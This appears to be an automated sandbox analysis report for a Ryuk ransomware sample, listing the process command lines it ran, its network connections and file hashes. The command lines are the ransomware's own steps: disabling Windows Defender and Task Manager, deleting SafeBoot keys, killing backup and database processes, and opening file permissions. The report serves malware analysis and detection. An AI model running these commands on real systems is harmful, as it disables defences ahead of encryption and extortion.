attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
FI 65.108.73.108:445 tcp
FI 65.108.73.108:139 tcp
N/A 10.127.0.1:139 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
NL 104.80.225.205:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 204.79.197.200:443 tcp

Files

C:\ProgramData\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 35194c73ff38dd6c3bed7c0efcff6826
SHA1 1a1ebd30f4a3498cc09824b6fdfdf1b8d9ae9db1
SHA256 5fce1d810a5e1c7536496c1b73eff77c9c3d92ac41f86959a1be5349663403ae
SHA512 cf2ed61ffdfad8067aff8776e0dab1f27ea2551f7497108a6cca7eb0105a5f96ea1453dde29f488433cc645e55104d7397ee4f35db51526993823ef46763f28f

C:\ProgramData\hrmlog1

MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 4b6fbbf03e95f33ba5c363bb67de4b9b
SHA1 e45dbd1ba30ef87d57779dc8ef3f58aba87e5960
SHA256 3f449da876b4329929cd0832cf5098b7f9e1c07e5e25ffcbd2bd03b80aa9ead0
SHA512 bc2216b3c363f5466dd290bb0de6167c15b5f23ecfce978dde46b853b6e9ce78a8d029033805bdd6177ea0ef64612e84857d893a0b9fad31f042e05e09ac7e3b

C:\ProgramData\hrmlog2

MD5 9c66e5c92f7a62d7203428c7d1cda350
SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 9c66e5c92f7a62d7203428c7d1cda350
SHA1 5b8851a561e6c39000d58f6dcc91b858caa98224
SHA256 2d5f5f7ba92a73632855302d47121700e4cd39f2d6784332125ee2ac2acbc2fe
SHA512 9ce06641d71ecad6f5a24b4b402193f26cafe1a21c0ec44e61b2247959c47838299f06636e7ddea9e41eeb3f1f7dcb76489f2dfac51579f509618534b1b10911

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 20bf1c3daf0bf3cfb0db6661538a9afc
SHA1 5db0319ce78dcae075cc393c374b0856cdc2e02a
SHA256 fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
SHA512 bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

C:\ProgramData\RYUKID

MD5 20bf1c3daf0bf3cfb0db6661538a9afc
SHA1 5db0319ce78dcae075cc393c374b0856cdc2e02a
SHA256 fb3092f5b65b685c2b3550ddbabcc6313a90cced525fe2d3a3e76b692e5f09c6
SHA512 bfbac6e6618881f2b8bb119da816441d6540d4137bd4df631d1b3874f301aa1c599d5e488e109adae6e2ee26f15ca67e1d98a8e09bc9fedac77c99477e00e98e

C:\ProgramData\RyukReadMe.txt

MD5 3cfd6ef3b2825aa6ce421e10604ff452
SHA1 7c7c75df4105d3b0d69d1e03220f4d24644a8bde
SHA256 65adfc7e8a2bf62ec815a0aded844c1f0812576d655e523201b02ca5ffe3313d
SHA512 d6c130f880ae02ff9f1d08e4b8c825d42f0ea640bd74faf16841a13438976b5e41b94d6260da1622848c3197ad25f446064fd60264b62d992b87c780dbb693fc
